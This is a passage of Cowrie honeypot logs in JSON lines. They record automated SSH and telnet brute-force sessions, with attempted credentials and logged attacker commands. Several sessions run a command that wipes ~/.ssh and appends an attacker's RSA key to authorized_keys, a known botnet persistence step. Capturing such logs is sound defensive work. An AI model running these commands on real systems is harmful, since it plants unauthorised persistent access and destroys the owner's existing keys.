cm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:24:19.025679Z","src_ip":"212.227.235.229","session":"93fda8460b98"}
{"eventid":"cowrie.login.success","username":"root","password":"1234@Abcd","message":"login attempt [root/1234@Abcd] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:24:20.023539Z","src_ip":"212.227.235.229","session":"93fda8460b98"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:24:20.542187Z","src_ip":"212.227.235.229","session":"93fda8460b98"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:24:20.542917Z","src_ip":"212.227.235.229","session":"93fda8460b98"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:24:20.544071Z","src_ip":"212.227.235.229","session":"93fda8460b98"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:24:20.795315Z","src_ip":"212.227.235.229","session":"93fda8460b98"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:24:21.407750Z","src_ip":"212.227.235.229","session":"93fda8460b98"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:24:21.408423Z","src_ip":"212.227.235.229","session":"93fda8460b98"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:24:21.658468Z","src_ip":"212.227.235.229","session":"93fda8460b98"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:24:21.659345Z","src_ip":"212.227.235.229","session":"93fda8460b98"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42281,"dst_ip":"1.2.3.4","dst_port":22,"session":"2410f2219ebd","protocol":"ssh","message":"New connection: 212.227.235.229:42281 (1.2.3.4:22) [session: 2410f2219ebd]","sensor":"my-vps","timestamp":"2025-09-09T02:24:21.902712Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:24:21.908947Z","src_ip":"212.227.235.229","session":"2410f2219ebd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:24:22.159308Z","src_ip":"212.227.235.229","session":"2410f2219ebd"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:24:23.149097Z","src_ip":"212.227.235.229","session":"2410f2219ebd"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:24:24.402582Z","src_ip":"212.227.235.229","session":"2410f2219ebd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42842,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2d3f3502d70","protocol":"ssh","message":"New connection: 212.227.235.229:42842 (1.2.3.4:22) [session: b2d3f3502d70]","sensor":"my-vps","timestamp":"2025-09-09T02:24:24.650101Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:24:24.652764Z","src_ip":"212.227.235.229","session":"b2d3f3502d70"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:24:24.903080Z","src_ip":"212.227.235.229","session":"b2d3f3502d70"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:24:25.906400Z","src_ip":"212.227.235.229","session":"b2d3f3502d70"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:24:26.162394Z","src_ip":"212.227.235.229","session":"93fda8460b98"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:24:26.163250Z","src_ip":"212.227.235.229","session":"b2d3f3502d70"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33360,"dst_ip":"1.2.3.4","dst_port":22,"session":"f74b641260ae","protocol":"ssh","message":"New connection: 212.227.235.229:33360 (1.2.3.4:22) [session: f74b641260ae]","sensor":"my-vps","timestamp":"2025-09-09T02:25:08.513345Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:25:08.514879Z","src_ip":"212.227.235.229","session":"f74b641260ae"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:25:08.811339Z","src_ip":"212.227.235.229","session":"f74b641260ae"}
{"eventid":"cowrie.login.success","username":"root","password":"admin123456!","message":"login attempt [root/admin123456!] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:25:09.992400Z","src_ip":"212.227.235.229","session":"f74b641260ae"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:25:10.651282Z","src_ip":"212.227.235.229","session":"f74b641260ae"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:25:10.651970Z","src_ip":"212.227.235.229","session":"f74b641260ae"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:25:10.652748Z","src_ip":"212.227.235.229","session":"f74b641260ae"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:25:10.950979Z","src_ip":"212.227.235.229","session":"f74b641260ae"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:25:11.561208Z","src_ip":"212.227.235.229","session":"f74b641260ae"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:25:11.561987Z","src_ip":"212.227.235.229","session":"f74b641260ae"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:25:11.859520Z","src_ip":"212.227.235.229","session":"f74b641260ae"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:25:11.860642Z","src_ip":"212.227.235.229","session":"f74b641260ae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34608,"dst_ip":"1.2.3.4","dst_port":22,"session":"c70ece477d8b","protocol":"ssh","message":"New connection: 212.227.235.229:34608 (1.2.3.4:22) [session: c70ece477d8b]","sensor":"my-vps","timestamp":"2025-09-09T02:25:12.073563Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:25:12.075223Z","src_ip":"212.227.235.229","session":"c70ece477d8b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:25:12.333268Z","src_ip":"212.227.235.229","session":"c70ece477d8b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:25:13.372134Z","src_ip":"212.227.235.229","session":"c70ece477d8b"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:25:14.636394Z","src_ip":"212.227.235.229","session":"c70ece477d8b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35774,"dst_ip":"1.2.3.4","dst_port":22,"session":"22089f5acec6","protocol":"ssh","message":"New connection: 212.227.235.229:35774 (1.2.3.4:22) [session: 22089f5acec6]","sensor":"my-vps","timestamp":"2025-09-09T02:25:14.981700Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:25:14.982323Z","src_ip":"212.227.235.229","session":"22089f5acec6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:25:15.281053Z","src_ip":"212.227.235.229","session":"22089f5acec6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:25:16.516116Z","src_ip":"212.227.235.229","session":"22089f5acec6"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:25:16.813723Z","src_ip":"212.227.235.229","session":"f74b641260ae"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:25:16.817497Z","src_ip":"212.227.235.229","session":"22089f5acec6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47532,"dst_ip":"1.2.3.4","dst_port":23,"session":"5f673f495201","protocol":"telnet","message":"New connection: 212.227.125.160:47532 (1.2.3.4:23) [session: 5f673f495201]","sensor":"my-vps","timestamp":"2025-09-09T02:25:21.744409Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:25:21.828452Z","src_ip":"212.227.125.160","session":"5f673f495201"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:25:21.892344Z","src_ip":"212.227.125.160","session":"5f673f495201"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42440,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9cfec17a351","protocol":"ssh","message":"New connection: 212.227.235.229:42440 (1.2.3.4:22) [session: a9cfec17a351]","sensor":"my-vps","timestamp":"2025-09-09T02:25:23.975707Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:25:23.980081Z","src_ip":"212.227.235.229","session":"a9cfec17a351"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:25:24.357353Z","src_ip":"212.227.235.229","session":"a9cfec17a351"}
{"eventid":"cowrie.login.failed","username":"debian","password":"qwerty","message":"login attempt [debian/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T02:25:25.860773Z","src_ip":"212.227.235.229","session":"a9cfec17a351"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:25:27.239921Z","src_ip":"212.227.235.229","session":"a9cfec17a351"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:25:27.679698Z","src_ip":"212.227.235.229","session":"ecbb12e776ba"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11743,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7b93d3dd30b","protocol":"ssh","message":"New connection: 185.152.45.241:11743 (1.2.3.4:22) [session: e7b93d3dd30b]","sensor":"my-vps","timestamp":"2025-09-09T02:25:29.696703Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:25:29.697397Z","src_ip":"185.152.45.241","session":"e7b93d3dd30b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","a